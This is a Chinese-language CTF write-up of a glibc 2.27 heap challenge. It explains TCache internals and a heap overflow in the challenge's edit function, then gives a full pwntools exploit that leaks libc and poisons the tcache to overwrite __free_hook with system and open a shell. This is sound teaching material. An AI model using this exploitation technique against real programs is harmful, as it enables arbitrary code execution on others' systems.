实验平台:
x86_64, Ubuntu 18.04.6 LTS, Kernel 4.15.0-170-generic
GLIBC 2.27-3ubuntu1.5
实验Binary及答案:https://github.com/bjrjk/pwn-learning/tree/main/TCache/tcache
ELF安全信息:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
amd64体系结构,保护全开。
IDA反编译后代码:
int setbufs()
{
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
return setvbuf(stderr, 0LL, 2, 0LL);
}
char *__fastcall readin(char *buf, size_t size)
{
char *result; // rax
char *v3; // [rsp+18h] [rbp-8h]
v3 = &buf[(int)read(0, buf, size)];
result = (char *)(unsigned __int8)*v3;
if ( (_BYTE)result == 10 )
{
result = v3;
*v3 = 0;
}
return result; // vulnerable
}
int readint()
{
char nptr[56]; // [rsp+0h] [rbp-40h] BYREF
unsigned __int64 v2; // [rsp+38h] [rbp-8h]
v2 = __readfsqword(0x28u);
readin(nptr, 16LL);
return atoi(nptr);
}
void create()
{
int i; // [rsp+Ch] [rbp-4h]
for ( i = 0; i <= 19; ++i )
{
if ( !strings[i] )
{
strings[i] = (char *)malloc(0x30uLL);
puts("Input your content: ");
readin(strings[i], 0x20uLL);
break;
}
}
if ( i == 20 )
puts("No free space for you!");
}
unsigned int edit()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("Select string: ");
v1 = readint();
if ( v1 < 0 || v1 > 19 )
return puts("Out of bound.");
if ( !strings[v1] )
return puts("String not found.");
puts("Input your content: ");
return (unsigned int)readin(strings[v1], 0x40uLL);// vulnerable
}
int delete()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("Select string: ");
v1 = readint();
if ( v1 < 0 || v1 > 19 )
return puts("Out of bound.");
free(strings[v1]);
strings[v1] = 0LL;
return puts("Delete done.");
}
int show()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("Select string: ");
v1 = readint();
if ( v1 < 0 || v1 > 19 )
return puts("Out of bound.");
if ( strings[v1] )
return puts(strings[v1]);
return puts("String not found");
}
int banner()
{
puts(" _ _");
puts("| | (_)");
puts("| |__ ___ __ _ _ ____ ____ _ _ __ _ __ _ ___ _ __");
puts("| '_ \\ / _ \\/ _` | '_ \\ \\ /\\ / / _` | '__| '__| |/ _ \\| '__|");
puts("| | | | __/ (_| | |_) \\ V V / (_| | | | | | | (_) | |");
puts("|_| |_|\\___|\\__,_| .__/ \\_/\\_/ \\__,_|_| |_| |_|\\___/|_|");
puts(" | |");
return puts(" |_|");
}
__int64 setup()
{
setbufs();
return banner();
}
int menu()
{
puts("----------menu----------");
puts("1. Create String");
puts("2. Edit String");
puts("3. Delete String");
return puts("4. Show String");
}
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // eax
setup();
while ( 1 )
{
while ( 1 )
{
menu();
v3 = readint();
if ( v3 != 2 )
break;
edit();
}
if ( v3 > 2 )
{
if ( v3 == 3 )
{
delete();
}
else if ( v3 == 4 )
{
show();
}
else
{
LABEL_13:
puts("Not implemented");
}
}
else
{
if ( v3 != 1 )
goto LABEL_13;
create();
}
}
}
本题目的glibc已经升级到了2.27版本,主要利用了ptmalloc中的TCache机制。下面我们来简要讲述一下TCache。
TCache
TCache的全名为per-thread cache
,顾名思义,是对每个线程单独的堆块缓存。
它从glibc 2.26加入ptmalloc,先于FastBin, SmallBin, LargeBin, UnsortedBin等Chunk List机制的应用。
/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */
# define TCACHE_MAX_BINS 64
# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)
/* Only used to pre-fill the tunables. */
# define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
/* When "x" is from chunksize(). */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size. */
# define usize2tidx(x) csize2tidx (request2size (x))
/* With rounding and alignment, the bins are...
idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
idx 1 bytes 25..40 or 13..20
idx 2 bytes 41..56 or 21..28
etc. */
/* This is another arbitrary limit, which tunables can change. Each
tcache bin will hold at most this number of chunks. */
# define TCACHE_FILL_COUNT 7
从上面的代码,我们可以看出,每个TCache默认使用64个Bin,每个Bin最多存放7个Chunk。多出的Chunk溢出到原先的4类Bins中。对于amd64体系结构,存放的Chunk范围是[0x20, 0x410]
。
TCacheBin的特点包括:
- 使用单链表结构
- 先进后出(FILO),按照栈的方式存储堆块
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
static __thread bool tcache_shutting_down = false;
static __thread tcache_perthread_struct *tcache = NULL;
TCache记录Bins头节点的数据并没有放在main_arena中,而是专门定义了一个对于每个单独线程的变量static __thread tcache_perthread_struct *tcache
。这个结构体会开在堆上。
TCache Chunk的特点包括:
- 不清除PREV_INUSE标志位
- 申请堆块时,不检查size字段
- 大于2.26,小于2.28版本的ptmalloc不检查double free
next
即原本的fd
指针,指向的是usermem,而非chunk。
通过以上我们可以看出,TCache相当于一种弱化的FastBin。FastBin的攻击方式都可以在TCache上实现,而且还无需伪造堆块,利用起来更加容易。
了解完TCache后,我们来看一下这道题目。
Exp
本题的漏洞点其实有两处:
一个是第19行,readin函数处。假如我们输入的最后一个字符不是\n
,我们就可以使得字符串不终结,从而进一步泄露后面的字符。但这一点在这道题目里没有用上。
另外一个是第58行,edit函数处,可以修改0x40大小的数据。但在新建堆块时(第38行),malloc的大小是0x30。因此,可以越界写入0x10大小的数据。正好可以写到SIZE字段。方便我们给堆块更改大小。可以利用类似offbyone的做法。
本题相对来说比较简单,请直接参考Exp和英文注释进行理解:
#!/usr/bin/env python2
# coding = utf-8
from pwn import *
from LibcSearcher import *
context(arch = "amd64", os = "linux", log_level = "debug")
def send_choice(choice):
p.recvuntil('4. Show String\n')
p.sendline(str(choice))
def create(data):
send_choice(1)
p.recvuntil('Input your content: \n')
p.send(data)
def edit(index, data):
send_choice(2)
p.recvuntil('Select string: \n')
p.sendline(str(index))
p.recvuntil('Input your content: \n')
p.send(data)
def delete(index):
send_choice(3)
p.recvuntil('Select string: \n')
p.sendline(str(index))
def show(index):
send_choice(4)
p.recvuntil('Select string: \n')
p.sendline(str(index))
p = process('./tcache')
elf = ELF('./tcache')
# gdb.attach(p, '')
"""
The size range of TCache is [0x20, 0x410].
"""
# Step 1: Fake an unsorted bin
for _ in range(19):
create(p64(0xdeadbeef00000000 + _) + '\n') # Create 19 consecutive chunk of 0x40 size, #0 ~ #18
edit(0, '\x00' * 0x38 + p64(0x40 * 17 + 0x1)) # Write the second chunk's size field to 17 times the original (0x440 > 0x410, enter unsorted bin), leaving the last chunk unmodified
delete(1) # Free the fake unsorted bin, #1
# Step 2: Leak LibC address by leaking the `fd` field of unsorted bin
edit(0, 'a' * 0x40)
show(0)
p.recvuntil('a' * 0x40)
__malloc_hook = u64(p.recv(6).ljust(8, '\x00')) ^ 0xa0 ^ 0x30
libc = LibcSearcher('__malloc_hook', __malloc_hook)
libc_base = __malloc_hook - libc.dump('__malloc_hook')
libc_system = libc_base + libc.dump('system')
__free_hook = libc_base + libc.dump('__free_hook')
log.info('malloc_hook: ' + hex(__malloc_hook))
log.info('libc base: ' + hex(libc_base))
log.info('system: ' + hex(libc_system))
edit(0, '\x00' * 0x38 + p64(0x40 * 17 + 0x1))
# Step 3: TCache Chunk use after free
create('\x01') # Create #1
create('\x02') # Create #19, having the same heap address with #2
delete(4) # Casually free a chunk other than #2 to provide a free slot for consequent exploit
delete(2) # Free slot to exploit
edit(19, p64(__free_hook)) # Write free chunk's fd field to `__free_hook`
create(p64(0))
create(p64(libc_system)) # Write `__free_hook` to `system`
edit(10, '/bin/sh\x00')
delete(10) # `system("/bin/sh")`
p.interactive()
参考资料
[1] https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/tcache-attack/
[2] https://blog.csdn.net/A951860555/article/details/115442780
[3] https://code.woboq.org/userspace/glibc/malloc/malloc.c.html